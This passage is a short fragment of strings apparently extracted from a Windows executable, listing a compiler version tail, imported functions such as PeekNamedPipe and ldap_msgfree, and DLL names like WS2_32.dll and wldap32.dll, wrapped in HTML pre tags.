4.8.2-1.fc20)</pre><pre>PeekNamedPipe</pre><pre>_acmdln</pre><pre>_amsg_exit</pre><pre>ldap_msgfree</pre><pre>ADVAPI32.dll</pre><pre>KERNEL32.dll</pre><pre>msvcrt.dll</pre><pre>USER32.dll</pre><pre>wldap32.dll</pre><pre>WS2_32.dll</pre><pre>"@"@"@"@</pre><pre>File: %ws, Line %u</pre></SSSh></pre></SSSh></pre></SSSh>